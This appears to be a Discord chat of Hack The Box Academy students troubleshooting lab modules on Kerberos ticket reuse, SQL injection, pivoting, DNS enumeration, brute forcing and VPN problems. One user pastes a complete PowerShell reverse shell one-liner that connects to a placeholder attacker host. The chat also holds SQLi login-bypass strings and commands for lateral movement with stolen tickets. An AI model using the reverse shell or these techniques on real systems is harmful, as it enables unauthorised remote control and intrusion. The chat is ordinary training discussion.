EU more like eww

please ignore. Just reset 2 more times and it worked XD

what question are you on ?

wait untill i get there, i am retaking the module

eu2 worked for me...thanks @next bronze. Got it right away

svc_workstations@inlanefreight.htb@linux01:/tmp$ Is this it ?

yep, thats where the ccache files are

there are 2 files that belong to the user julio

might wnat to send a message to support about the target being broken

hmm yeah one of those should work, the no logon server status is weird tho, can you reach the DC from that target?

i'm doing Malicious SCF File

i'm not getting this users hash

wrote the scf filee in backup

not sure, how could I test that? Other than with the command I'm already trying to issue

hey can someone explain to me why this injection worked for me ?
Executing query: SELECT * FROM logins WHERE username='tom' or '1'='1' AND password = '1' --'' AND password = ''; im at the subvverting query logic in the sqli fundementals

Once you have the ticket you need to export it. export KRB5CCNAME=path_to_ticket.ccache . Then you can use other tools with the cached ticket of the user that has rights to do xyz. An example would be like netexec smb 10.10.10.10 -k -x “type C:\Users\julio\julio.txt” this would use the cached ticket to run a cmd and read that txt file but the -k flag can be used with most of impacket suite

at first i tried to make everything past password = '1' a comment and then i noticed it added a ' to my syntax i added another apostrophe it worked

thinking of it , and trying it making this another and argument was useless so i removed it and it worked again

right, I was trying to run the command taught in the module, smbclient //dc01/julio -k -c ls -no-pass after the export command

Question, this is a loop from a reverse shell for powershell, and it makes me curios as to how does the connection using this script doesn't get terminated if I don't send it a command for a bit, because wouldn't it evaluate it as if I sent data that is smaller than 0 in length? or does my computer just constantly send "im here" packets to notify?

heres the full code:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('{attacker_machine}',{port_num});$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

I don't think you're doing anything wrong there, try changing vpn servers?

I am having trouble to remember myself how did i do it

tried already, like 4 or 5 times yesterday and 2 more today. It seems like there is something wrong with the server. I tried contacting support but got no response since yesterday

this smbclient command is the one shown in the exercise solution as well

root@linux01:/tmp# i am allready a root but i cannot remember how i did the flag

I used nmap to find 6 services. I enumerate them one by one, look at anonymous connection, default credentials, CVEs, I even wrote my own exploit... I set up all the services on a VM to try some options... nothing... I wrote a Markdown page of all of my researchs but I don't know if I can share it here.

Sounds like you didnt find the correct service yet

If you want you can dm me them.

And ill check. Dont wanna give a big hint away

hi anyone else having trouble getting a target to start?

its taking forever

I'm just gonna come back to it later

see if things clear up

ok steps are like this, get the root and copy /tmp/krb5cc_647401106_UHrJ9h from julio, dont copy the HRJDux, export KRB5CCNAME=/root/krb5cc_647401106_UHrJ9h

smbclient //dc01/C$ -k -c ls -no-pass

this file /tmp/krb5cc_647401106_UHrJ9h does not exist in the server

its for me, dont copy paste but LS /TMP

these are mine

y7nah something

I have tried the export command with all of them already

copy this to /root

Y7naHy

yep, thats what I did here: #modules message

in the sequence of commands I sent in thatprint, I copy the files to root, then export, then try the smbclient and get the error

it works for me

right now?

did you see the last message

smbclient //dc01/julio -k -c ls -no-pass

julio.txt A 17 Thu Jul 14 21:18:12 2022

so ls /tmp and copy the second ticket to /root, not DUX something

cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist

or whatever your name is, there are 2 julio's

dux and the real one

yes, that is exactly what I did

vim /etc/hosts

add this 172.16.1.10 inlanefreight.htb inlanefreight dc01.inlanefreight.htb dc01
172.16.1.5 ms01.inlanefreight.htb ms01

:w for save :x for exit

smbclient //dc01/julio -k -c "ls" -N should be working

exporting the ccache file, I get the error:

add computers to /etc/hosts

save and exit

after adding the register to /etc/hosts, still get the error with the same ticket:

smbclient //dc01/julio -k -c "more julio.txt" -N

still get the error:

root@linux01:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 ubuntu

172.16.1.10 inlanefreight.htb inlanefreight dc01.inlanefreight.htb dc01
172.16.1.5 ms01.inlanefreight.htb sm01

The following lines are desirable for IPv6 capable hosts

::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouts

rewrite the /etc/hosts

smbclient //dc01/julio -k -c "more julio.txt" -N
getting file \julio.txt of size 17 as /tmp/smbmore.FNGpCJ (16.6 KiloBytes/sec) (average 16.6 KiloBytes/sec)

ls /tmp

you have to ipmort the key again

I already have imported

import again

root@linux01:~# ls /tmp
krb5cc_647401106_HRJDux <- BAD
krb5cc_647401106_UHrJ9h <- GOOD but your might differ

go to /root, cd /root
cp /tmp/krb5cc_647401106_UHrJ9h .

export KRB5CCNAME=/root/krb5cc_647401106_UHrJ9h

klist

root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_UHrJ9h
Default principal: julio@INLANEFREIGHT.HTB

hm. you did everything right but still there is a problem

exactly

thats will I asked if you were accessing the server right now. This might be a recent problem

how about i just give you the flag ?

I can see it in the Solution section, so its ok, but I would like to understand why it is not working

i followed the same steps and it works for me. i use EU2 VPN

I'll try changing to that one

save the steps in the notepad so you dont have to go all over again

but it works fine for me, so i am confused also

answer me this where did you change the /etc/hosts on your machine or in ssh session

@calm abyss it worked in the EU VPN! Seems like there is an issue with the US VPNs (I tried changing among the 3 US VPNs before, same issue)

@calm abyss thanks for the help!

can you make it now ?

yep, it worked, got the file

good to hear, keep on hacking

send a message to support, seems like a few things across modules aren't working

Hoping some one can point me in the right direction, in attacking Enterprise networks -> exploitation and privilege escalation. Having issues with the webserver, read some help here but still not working. I'm using proxy chains with ssh dynamic port forwarding, Firefox and foxy proxy. My get request work just fine and the page loads within a second (I did clear my cache just to make sure it wasn't a false positive) but no matter what I do the post request to log in or even the post request to register an account sit there until I get a connection time out. I've tried restarting the boxes. I've tried my own box versus the pwn box provided, I keep coming across the same issue.

There may be some interesting credentials in Internal Information Gathering that will help you log in.

Thx yeah I got those. My issues seems to be purely related to the proxy not sending my post request. Even using the found information my post request will just hang until it finally times out.

you don't need to set your foxyproxy/burp. just use Firefox manual proxy with Socks5 127.0.0.1 then your {PORT}

Can anyone please explain using HELO/EHLO to send commands to SMTP via Telnet? I read up on it in some other places but couldn't really understand much from the example they've shown in the Footprinting SMTP module

Has anyone else been experiencing targets stop responding when youre in the middle of something? I'm doing the Attacking Enterprise Network and I'm RDP'd into MS01 and then it freezes/crashes. Then, I try to RDP again and I get a black screen. Which I can't get back into until resetting again. I'm on reset 7.

Is it safe to assume to go with port 22

as port 80 is http and u cant get shell control with a http port

cant seem to get a way in on this IP

10.129.200.169

I had some issues earlier as well. Seems to come and go. Been especially seeing this more with any Windows labs

Its actually been very very bad. I do an action (making file or copying file) then it freezes. Time clock still works though. Then, I have to RDP back in. Then eventually it just stops letting me back in

Ugh - yeah - maybe its a built in feature from HTB to let us experience slow degrading conenctions - lolz

xD I was going to be finishing the whole course today, but with this happening. There isn't anyway hahaha

Oh

Yeah, thats awesome you're at that module!! - I have 13 more to go, finishing up AD Enumeration now , lab 1 assessment . Do you plan on scheduling the exam soon ?

Oh

I'll schedule it 6-8 months from now hahaha. I still have a lot to learn and not enough notes and experience. I'll be practicing writing reports for some of the ProLabs and going through a good many of the boxes. Then, I'll assess what I'm weak at and focus some attention there. Basically, what can I do blind and what can't I do blind.. Then, I should be ready by then. It took me 3 months to finish the whole thing. And 3 months of experience isn't enough I dont think lol

I think you are provided two exam attempts - maybe worth just to give it a shot - you never know! Either way - good luck on the path

Module: ADCS attacks
Section: PKINIT

Not sure whats wrong with the administator.pfx
Its giving me error "Error outputting keys and certificates"
I tried it with pwn box as well, no clue whats going on.

Thanks! I'll get there eventually. I'm enjoying it 😄

can someone try find the module for 10.129.200.169

why was no session created

Follow along with the module. It goes over the exploit and how to use MetaSploit. Also, that's linux and not windows.

providing the ip wont help on what module u doing

😵‍💫

ye ik its linux i used nmap and its on linux

I'm getting a BrokenPipeError: [Errno 32] Broken Pipe when I'm trying to download Inveigh onto MS01 on Lateral Movement for Attacking Enterprise Network. Is this an issue with how I set up my proxychains? I'm doing socks4 127.0.0.1 9050. I can't copy from my /drive:/home/htb/. I'm getting an expected error for that as well.

In the guide of the module you are exploiting a windows system. So, your exploit "linux/http/..." wouldn't work. The payload that is used in the module is (windows/meterpreter/reverse_tcp and the exploit exploit(windows/local/ms15_051_client_copy_image)

it wants a session

Attacking email services Q2. Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.

The command I'm using is ||hydra -l marlin@inlanefreight.com -P /home/inf0/HTBA/ACS/pws.list 10.129.98.248 pop3|| but it doesn't find anything

I tried it with rockyou and I tried changing the protocol but nothing works. Any tips?

Follow along with the module. You get the session prior to exploit.

which module is that?

Attacking common services

Wrong domain for email

Im such an idiot

Get coffee 😄

Making a cup as we speak

😄 I just did as well. Going to be a late night

ATTACKING COMMON SERVICES

I got stuck in the question in the Dns module, I discovered a few subdomains but no result. blog,my,....

i also suggest deleting or redacting the username -- as it's a spoiler for q1

make sure your domain is inlanefreight.htb not inlanefreight.com

@fathom pendantYes, I understand that, but I still can't find it.

as long as you didn't mess with the names.txt in subbrute, you should find it

Working in SNMP section of “footprinting” and stuck on last question. “Enumerate the custom script that is running on the system and submit its output as the answer ?” I don’t understand what they want in the answer. I’m using snmpwalk and found the other answers in section but I’m confused what they are asking for, on last question. Any help or further resources to look at would be really appreciated 🤙🏽

if you use snmp walk you should find that there's a .sh file that runs

@solar grove it's getting deleted by automod because it's detecting it as spam

I found these
www,blog,my,support,ns1
But I tried all of them I am looking for zone transfer failed error. I also wrote inlanefreight.htb in the etc/hosts file. I don't understand why it says ns1.inlanefreig.htb in the example.

try with the ip of the target instead

the examples won't always match up to the exercise 1 to 1

@fathom pendant I get python errors when I type the ip address

the command would look like ./subbrute.py inlanefreight.htb -s names.txt -r resolvers.txt

@fathom pendantMy command is the same as this one and the result gives the domains they found (ns1,blog,my,support.inlanefreight.htb) but none of them are doing zone transfer.

that would be correct as none of those are the answer

I don't understand, this is not related to the answer I found, can you help me?

Yes found the .sh that’s running script but confused by directions if that file path is the output they are looking for or the oid # or both confused by the answer format they want @fathom pendant

just the output

if you follow a handful of the OID after the .sh that runs you'll see it's output

i'm telling you. that the answer is none of those, it is in the original names.txt that comes with subbrute

as long as you don't modify that, you're fine

i literally just ran it with only the ip in my resolvers.txt (ran it twice) and it worked

even adding the ns.inlanefreight.htb to my /etc/hosts and using that in my resolvers.txt instead gave me the expected answer

@solar grove dm me your output that you're getting

@fathom pendantI solved it but I don't understand why it works according to my head, can you inform me. I wrote ns1.inlanefreight.htb in /etc/hosts file and I used @ns1.inlanefreight.htb when transferring zone. why it didn't work on inlanefreight.htb.

because the nameserver isn't ns1

dig ns inlanefreight.htb @ip

then when you find the right subdomain it's dig axfr subd.inlanefreight.htb @ip/nameserver

inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
but it shows it as a nameserver, which means it's a nameserver.

yes ns is the nameserver; not ns1

I get it, one question in my head is gone. My last question is where we discovered ns1.

?

Found it lol deff wasn’t expecting that kinda output thanks 🤙🏽

ns1 was never discovered in digging/enumerating the target IP

the ns1 was for inlanefreight.com <-- not .htb

inlanefreight.com is a real (fictional) website

bumpo

In Intro to Windows: NTFS vs. Share Permissions, I'm trying to mimic the instructions to mount a share using
"sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //10.129.156.61/"Company Data" /home/htb-ac-10648/Desktop/"

I have the firewall domains set to allow access on the Windows host (domains), and i have NTFS permissions set to full access for everyone, and Share permissions set to full control. But for whatever reason, I'm getting hit with a "No such file or directory" error. Spelling isnt the issue so I'm not sure what gives. Any advice?

I can access the share just fine with smbclient.
Note: I see the share on my pwnbox in Windows but not the Linux VM itself.

I'm starting to think this is expected behavior and the reasoning behind this is beyond the scope of this lesson?

"On the pwnbox in windows" you're using the in-browser pwnbox and your own vm?

If so: that's the reason for it breaking

The vpn assigns you an ip that causes network collisions and breaks things

You can only use on or the other for interacting with targets

Let me clarify; on the pwnbox via SSL VPN when RDPing into the Windows VM provided by the module

that didn't clarify anything

are you using the in-browser vm? yes or no

I literally do not know what "on the pwnbox via SSL VPN" you connect to the pwnbox either via the in-browser visual or via ssh to the public IP in it's interface

no vpn required (it uses the vpn to connect to targets)

but you don't need to run the vpn on your own machine to use the pwnbox

the in-browser connects via SSL VPN....
"SSL VPN
This is essentially a VPN that is done within our web browser and is becoming increasingly common as web browsers are becoming capable of doing anything. Typically these will stream applications or entire desktop sessions to your web browser. A great example of this would be the HackTheBox Pwnbox." per Introduction to Networking: Network Types module

i understand what that means but YOU don't interact with the VPN

is what i'm saying

you're abstracting it too much

which is causing additional confusion

what i'm simply asking: are you running the VPN on your machine or not

web browser -> ssl vpn -> rdp into windows via pwnbox
So, no.

https://tenor.com/view/facepalm-really-stressed-mad-angry-gif-16109475

thank you

you're making it more complicated than it needed to be

k

i just wanted to double check and verify that you weren't running the VPN on your machine, which will cause conflicts in things not working properly

as far as the connection thing goes, have you tried wrapping the entire connection in doublequotes

i.e. "//ip/share name"

I have, yes. Same error

can you connect to it via smbclient?

I see the share using net share on the Windows RDP session, but not on the Pwnbox VM itself.

Also yes. I can both list and interact with the shares

then it's mostly working as intended: Sharing resources doesn't generally mean you can mount them

depends on how they're shared and set up

you generally can't mount an smb share to linux

Ahh that makes sense then. I think my expectations were off, then.

Thanks for your time.

And your frustration.

😉

Anyone had issues spawning targets in academy, getting time out errors?

all day

once

started this hour

I have a problem with my VPN since yesterday. I think the problem is in this lesson only

try pwnbox

okay

https

it's http://

not an issue with vpn

literally wrong protocol

no still not work

https is usually fine on htb

i don't recall a module that you couldn't use https but i could be wrong

most use http

most of the time http doesn't work i found

several times in fact https is the one that causes the issue

When there is no good connection it automatically redirects it to https

maybe on the ones that are launched via docker are https fine

scan it to see if it's on an alt port

tun0 not found what my vpn work in bg

then it sounds like your vpn died

ps aux | grep openvpn to see if it's running

also if you didn't run it with sudo it likely died in the bg without you noticing

bound what is that ???

that's normal

scroll to the bottom

your ifconfig picture didn't show a vpn connection

sudo killall openvpn

oaky

you have multiple instances running

no it's nor,..

i see 3 instances of root running openvpn

so yes: that's multiple instances

either way

👆

ok try on yr box

u can see like that

if i run on my box it'll only ever show one + me running the grep command

especially considering different PIDs

Just killall as suggested or reboot and reconnect

i just run my alias not 3 vpn vhtb

well your alias seems to be spawning a few

okay i'll try agin

try running it manually instead of with your alias, just to make sure

i'm seeing a few different PIDs

also that

mu alias

ok?

we're not arguing your alias atm

https://superuser.com/questions/117913/ps-aux-output-meaning > from your output i'm seeing multiple PIDs for the openvpn process

3303 --> 3305

after rebooot still

ok

PID means Process ID, which is in the 2nd column of the ps command you ran, you can see they have different PID numbers, which means they are different processes

so something is causing issues

follow the command MarcieLee gave you, sudo killall openvpn

Do you have it in bashrc or something, and then executing again

do you have an automatic process that's running it?

then reconnect, try agian, if that doesn't work, reboot your whole pc and try reconnecting and doing it again

yup

Multiple terminal windows?

that makes sense why my guide didn't work for you yesterday

your multiple VPN's are causing problems, kill all those processes and just run it once

wtf i run two vpn and found this

my vpn = 3vpn

tmux

Hi guys, I'm having issue with Tomcat in module Shells & Payloads under "The Live Engagement". Everytime I try to upload the .war file in Tomcat it went to "The connection was reset".

and tun0 not found in ifconfig

Brother you were given the steps to resolve, execute them!

I did this and it did not work, but I will try to change the vpn file . thx bro

you need to resolve all the openvpn's that are open first

kill the processes, then reconnect to the vpn

might need to attach -9 to the killall command

When I kill the VPN and then try to run it, three other similar processes appear. I don’t know where they are coming from.

Sounds stupid.. but the IP / port listed in your config file

Can you actually connect to it

i have the same IP and can ping it

but i'm not actually getting it to fully connect; regenerating my vpn file now tho

They're on TCP

yeees

sudo kill -9 openvpn right ??

killall*

So when I said do you have that in bashrc, do you have the command to connect to the VPN in bashrc so it does it automatically when a session is started?

Or just the alias

alias

ok yeah can confirm running it does spawn 3 PIDs

i found this .and idk

question

when you run it: do you get: "Initialization Sequence Completed"

if not; that's why you don't get a tun0

no

@ocean night this might be related to US acad vpn server maintenance as well; considering this is the first time i'm running the connection since the maintenance period

maybe for testing comment all of your custom stuff out and just try manually

that's why you're not getting a tun0

idk

regenerate your vpn file (Download a new vpn file) and use that

okay i'll try

literally just downloaded a new config and it worked

old config hung at connecting to IP

Have you tried the UDP cknfjf?

Config*

that's definitely a word there

my old config was UDP

Shut it

Lol

i'm shrimply stating that it's likely with the maintenance being done, a new file was needed :)

Could well be

oop and just got another idea >:)

thx

What did it in the end?

download a new file

and it worked

thx MarcieLee 💚

anyone having trouble getting RDP access to machines in the ACTIVE DIRECTORY ENUMERATION & ATTACKS module? Stuck on Living Off the Land. Have tried swapping VPN servers 2x

it's letting me connect but just showing a black screen on the RDP client

did you press enter/space

wake it up

aha

thank you @cloud urchin !!

tried clicking on it but didn't try the old trusty keystroke d'oh

it's around the lower 2/3 of the screen centered

i have a question about the fawn module in the getting started list, i was wondering if someone could help me understand. the walkthrough for the module says the help for the ftp is "ftp -h" but it stated it was an invalid command. "ftp ?" worked instead and i just wanted to understand why. is it an update to something or did i do something wrong from the walkthrough?

Wrong channel

#starting-point

of course. thank you.

This channel is for academy modules

Windows or linux

Windows uses ? Or /?

thats my bad for the wrong channel

itstated it was unix

Yes; but I mean when you tried on your machine

oh. linux

Getting the following error whenever I try answer the first question of the "Kerberoasting - from Linux" module in AD Enumeration & Attacks - anybody else having this problem?

[-] Principal: INLANEFREIGHT.local\SAPService - [Errno 104] Connection reset by peer

Edit: 3 target resets later seems to have done the trick 😄

Not sure how long you waited before rebooting, but the AD modules take a bit longer to fully boot up, so make sure to wait 3-5 min.

Module name : Pivoting, Tunneling, and Port Forwarding
Section name : Web Server Pivoting with Rpivot
"New connection from host 10.129.162.202, source port 39110" this means i already succeed in the pivot part right?

i want do nmap scan in the 172.16.5.0/23 but it always timeout . why?

Yes

Sounds like your Rpivot is setup, so the next logical thing that would stop it is your proxychains configuration

Depending on your pivot you'll either need proxychains or whatever method by your tool

i used proxychains

proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.0:80 <--socket error or timeout!

Well if 80 isn't open on that device it won't connect

¯_(ツ)_/¯

172.16.5.0 is a bad address

the module says to use 172.16.5.135:80

try using that IP instead

not working .lots of "socket error or timeout!" error

you can proxychain to a service locally and use 127.0.0.1 to make sure it's setup correctly. maybe re-download the vpn, reconnect to the vpn, and restart the lab machine then wait ~3-5 mins to connect and try again

If we know the username is admin
then we should use ' or '1'='1 with password to bypass
why it is using with admin ?

as long as your syntax, targets, proxychains, vpn, etc are all setup and enabled correctly it will work

Guys
Any Idea????

Because he is the admin and has high priv

Imagine that you want to rob the bank. What would be better, to be the bank manager or to be just an ordinary person working in the bank?

but what if I change admin to other username?

If you know which user, you will succeed

I advise you to study more carefully because it explains all of this

its seems to be a sqli example, in this case its saying if its running as admin and we did a or statement with 1 = 1 the then it will bypass the password bc 1 does in fact equal 1. OR statements just sees if one of the two things in this case admin or 1=1 is true then allow

why to make 2 cases if already known that username is admin

it wouold accept admin as username and password should be use with 1=1 to bypass it

yeah just bc u know the username doesnt mean u know its password so thats why with the sqli u did an OR statement to bypass entering the correct pass

then it should be like this

No. As passwords are usually hashed

And entries are too. When processing the code

/users/user[username/text()='admin' and (password/text()='abc' or '1'='1')]

ooh

yeah it could be

Saving passwords plaintext is like the worst thing any DBA/developer can do

offcourse

By putting a comment after the entry of username the rest of the query won’t be processed as they go be a comment

Anyone solved Error-Based SQL injection from the Advanced SQL Injections module.

I was able to figure it out because of the hint and obvious title on the webpage, but how on earth would I have known what to search for based on the nmap scan??

Getting Started/Pentesting Basics/Public Exploits

which module is that? is that the cow?

looks like getting started, next time include the module and section name

Getting Started/Pentesting Basics/Public Exploits

there's a port given for the target, so you'll only need to examine the port and not the whole IP

yea a lot of timse nmap wont give you all the info. so you need to get on that website and look for interesting/info stuff yourself

How do you examine just that port?

with a browser, nginx is a web server, so to interact with web servers, you'll need a browser

later modules will teach you how to foorpint different services

So I should NOT have been able to figure that out without the hint?

well its a web server. you just visit it with the correct port (80 or 443 (http or https))
xreous was saying that later modules will teach you how to footrpint other services like imap, snmp, pop3 etc

you don't need the hint, go to the website, see the plugin version, google <plugin version> exploit. that's all

looks allright

(idk what that is)

Without the hint how would you know what to look for?
How would you go about solving that question?

What's this??

what I said, google the version shown in the website and try an exploit

U have to be smart to understand

That’s basically the hint.
I mean just from enumeration…

huh? you don't need the hint to google the plugin version

it's right there on the website

he probably means how do we know we need to visit the website?

oh

lol.
I already have the answer.

I’m saying, why would you think to google that??

this

to google the plugin name?
because a lot of outdated plugins have vulnerability, and the name of the plugin is served you on a golden plate in this exercise.
its always important to know the name and version of stuff running on every service

Right!
But of course it won’t be given on a golden plate. (In real life)

They teach you to find open ports through enumeration.
How would you even know that if it weren’t written on the front of the webpage??

thats gonna be taught to you in later modules. this one was served to you on a golden plate.

hence I said later modules will teach you how to footprint services better, this module is easy mode where the version number is right there on the website

this module you doing is just getting started. it wont teach you much deep stuff

Right… ok lol
I’ll leave it at that for now.

But I was saying I shouldn’t have expected to ever solve that without the hint. (At this point)

why not? googling is not rocket science. the module itself literately told you to google exploits, so you see the version number, google that + exploit

🙄 lol.

So what would you google?

Try to find information on the webpage itself

You have been an IP and port, visit it and observe

did you look at the website with your browser like I suggested

I did.

There is nothing there.

Try again, don't swerve your attention elsewhere

whatever I see here

Should have made the title bigger

I mean, now I know about “plugins”.
But you wouldn’t think to do that at first.

The module teaches you about enumeration and finding exploits on the open ports.
Nothing that comes up in the open ports would lead you to do that.

you're only given 1 port to work with

No (good) information comes up on that port.

Https?

you need to get better at googling ig

Why would I think to google simple backup plugin 2.7.10 from this?

if you google apache, what do you see? it's a http server (also in the nmap scan), so for http servers, you interact with it using a browser, when you go there using a browser, you're shown the plugin version

I feel like we're going in circles, if you're so set on believing that this section cannot be completed without the hint, so be it. good luck with future modules

Read the contents on the webpage and don't focus on scanning

As was stated before, this is given on a golden plate.
What would you do in a normal situation?

Google what you see and add the word exploit or vulnerability

as I've said for the 3rd time now, future modules will teach you how to footprint services

lol the answer isn’t usually going to be written front and center on the page.

Further down the modules you will be shown how to enumerate

This is as the name of the module suggest getting started

You won't be expected to do something a bit more difficult

Right!
And I’m just curious how one would have solved this without the answer basically given to you…

Got it.
But @next bronze is saying I don’t know how to google, ect ect lol.

the future will tell

lol.
Nice chat guys.

👌🏽

anyone able to help me with something at the start of the introduction to windows evasion?

https://dontasktoask.com

If you can ask it without spoiling or if it's just a general question, just ask

i need help in the windows evasion module getting the AES crypter to work

i think i've set it up wrong,wondering if someone can look at my code

if you could please DM me

hey all how to reset my neo4j user&pass

https://neo4j.com/docs/operations-manual/current/kubernetes/operations/reset-password/

hello, so i'm trying to answer this question: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. here is the command i came up with to try and find the good answer : curl "https://www.inlanefreight.com" 2>/dev/null | grep -oE "https://www.inlanefreight.com(/[a-zA-Z0-9./?=_-]*)?" | sed 's|https://www.inlanefreight.com||' | sort | uniq | wc -l. I cannot figure out how to do it differently, I really need help on this one. Thanks in advance

I mean there's not much to do differently

It's a bunch of filtering and finding references to inlanefreight.com and filtering

Though I don't recall sed using | rather/

Which you'll need to escape special characters

(Note it helps if you put your command in backticks so it's easier to parse)

`like this`

This one I used a fair bit of googling and mostly copied a command I found on the forums

I see, thank you for your answer ! I tried using sed differently but still can't find the correct answer this is so annoying. Thanks again for the advice though!

Yes I forgot to do it ^^ my bad

I need someone to drop some knowledge on me about SSH tunneling. I'm doing Attacking Enterprise Networks and I have admin hash. I'm trying to connect to the DC with this hash. However, I keep getting a HTTPClient timeout error or HTTPResponse Error. I'm able to ping and nmap scan the DC. I've tried using msfconsole autoroute and chisel to SOCKS tunnel traffic, and using ssh -D {port} and using proxychains as part of the argument in my command to connect to the DC. I've googled until I can drop on fixing the issue. Could this be a technical issue with the target or issue with my socks tunnel or /etc/proxychains.conf or something else entirely?

Yeah but for some reason you are using pipes | in your sed and not /

I thought that sed was using these delimiters | and not /? Wouldn't that be confusing with the urls?

Well you need to escape special characters

Sed uses / between it's arguments

So you'd need to format http:// as http:\/\/

Which escapes the / character

So it doesn't get interpreted as ending the statement

Anyone having issues with the VPN?

https://linux.die.net/man/1/sed [man sed]

like this? curl -s "https://www.inlanefreight.com/" | grep -oE "https://www.inlanefreight.com(/[a-zA-Z0-9./?=_-]*)?" | sed 's/https:\/\/www\.inlanefreight\.com//' | sort | uniq | wc -l

It works fine with me

Try generating and downloading a new vpn file

I tried regenerating. The TLS handshake keeps failing. I'll try a different server.

I still get the same answer :/ I think I'm just gonna pass on this one

Hey I have a slight query using gobuster, here i used a patterns file, but gobuster not even following the pattern i gave it

the patterns file

Just search the forums for a command

https://forum.hackthebox.com/t/linux-fundamentals-filter-content-filter-all-unique-paths-of-domain/270162

This one includes an explanation

There's a simple and slightly more complex command in the forums

Thank you so much. I didn’t know there was so many responses available on the forums. I will look it up more often

Np you're likely to find a bunch of info on tier 0 modules

Tried 2 EU servers and 2 US servers. Then tried returning to an old snapshot of my VM and it still doesn't work

I also suggest running the command one pipe at a time to see what it's doing

Sure I will do it. I am a bit familiar with all these commands separately but combining them is quite new to me

Hey guys, is there a way to run ubuntu+gui in docker ?

Probably. You'd just need to open an rdp port for it

Likely a few google searches can get you there

Who do I contact if I'm still having issues with the VPN?

Support

I take it you're running openvpn with sudo / as root

Yes

Where's support? 😅

There's a green bubble in bottom right of academy

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Thanks

I for the life of me cannot spot the green buble 💀

Disable adblock then

Thanks, found it.

module:session security section:csrf(get based) If csrf.htb.net was utilizing SSL encryption, would an attacker still be able to alter Julie Rogers' profile through CSRF? Answer format: Yes or No

I mean the answer is likely in the reading

when i set answer to yes it is right

And the section likely explains it

It's also helpful to express your confusion about something rather than just reposting the question

this is wrong because if we on local network we are unable to sniff https traffic so how could and attacker can gain csrf token ??? if anyone have knowledge about it tell me the module name is session security section:csrf (get based)

https://owasp.org/www-community/attacks/csrf#:~:text=HTTPS,preventative measures to be trustworthy.

https://learn.microsoft.com/en-us/aspnet/web-api/overview/security/preventing-cross-site-request-forgery-csrf-attacks

Hope these help clear up any confusion

Tldr the csrf can still send https://

@fathom pendant but at the start the start of section thet write . Similar to how we can extract session cookies from applications that do not utilize SSL encryption, we can do the same regarding CSRF tokens included in unencrypted requests.

It likely later explains that it's still possible with ssl

Again I provided 2 additional resources that explain that ssl does not inherently prevent csrf

As the malicious site can just send the request as https:// instead of http://

because they write in the way the attacker first have csrf token of victim that is only gain by network snifing so it means that the if we sniff https traffic we were able to get csrf token of victim ???

You might not sniff it over the network but the data is decrypted at the end point, you don't need to see it's transit

Usually csrf gains tokens via some form of malicious form

Not generally just by sniffing

but in the particular section they write at first

Ignore the at first portion

You're focusing too much on that

I'm telling you: typically csrf is attained via malicious web form, not by sniffing

In which case sniffing does not matter

that they intercept the request using burp then capture the csrf token of victim then used it to mount the attack

sigh

At least read the additional resources I linked to gain more insight

Instead of trying to argue about the examples

@fathom pendant i understanding you but the context i tell u is different in that section how an attacker would gain csrf token of victim if he not sniff the network you tell me ???

sighs by having the victim visit a malicious site which will capture the tokens

As cookies are always sent with any http(s) request

but in the section they first capture the csrf token of victim then used it to write the attacker crafted web page

I'm done trying to further explain it when you're extremely hung up on the example

Also burp isn't a sniffer

It just intercepts traffic

So it doesn't see the request the same way something like Wireshark would

With burp, the traffic is already decoded

i know burp is not sniffer they just tell like that way two user on the sam network

Just nevermind

Point is. Csrf is still possible

Both links I provided earlier state https alone is not enough to prevent csrf

to exploit csrf the conditons must be met 1:sessoin based on cookie only and 2 :no unpredictable parameter in this case csrf parameter is unpredictable by attacker so who he can exploit it ???

They likely explored the webpage itself to see what the vulnerable parameters are then crafted a malicious site based off that

If there's a csrf token, then yes it's harder

But https doesn't magically make a csrf token

It just puts the ssl layer on the webpage

That's it. Ssl doesn't inherently magically add things

The question was simply "if ssl is enabled can you still csrf" which you can

Not "if csrf tokens are implemented"

their is csrf token that they used to make the attaker web page with the same value of victim csrf token then serving him to perform csrf

No, they got the session token/cookie

Which is different

they just copy paste the value

Also: it's not asking how its asking if and later sections likely explain it

which is not possible in real world

No, it's possible

While not common

Csrf is very much still possible

can you tell the scanrio of attack

https://portswigger.net/web-security/csrf

https://www.ghacks.net/2008/01/17/dos-vulnerability-in-utorrent-and-bittorrent/

Anyway. Point is

All sources say it's possible with https

Because ssl alone isn't enough

Usually other stuff would be added on top of https that would mitigate or prevent

for getting local admin on ad attacks skills assessment ii, on the sql01 host, is the intended way supposed to be abusing one of the privileges the user has

i left talking about ssl or without ssl i just tell how they say they could work in local network

Potatoes can be delicious, and printers like to be spoofed

do they really?

Brother, it's the same principle

In this instance, yes 😄

they are wild

@fathom pendant the resource you share is verb tempring

You're overcomplicated the simple question

????? All resources articles state csrf and the link to the utorrent attack was referenced in the owasp page I linked

the last question

So unless owasp is wrong

And portswigger

in the particular section what they want to convey like first they write in the attack scnrio in local network then in the middle they capture the victim request and copy the csrf token and paste it to perfom attack and at the end they say they is able to change victim profile if ssl implemented

@fathom pendant i am not saying anything right or wrong i just want figure out the content written in the seciton

The section does not mention ssl, so that part requires research

Which takes maybe a few seconds to google

Which all i did was google "does https prevent csrf" and "is csrf possible with https"

@fathom pendant i suggest you to skim the section in free time

I am looking

@

And as I said, while it doesn't mention ssl

Research will tell you the answer

And tell you why

Which it's mostly unrelated to the question

As it boils down to, csrf and https

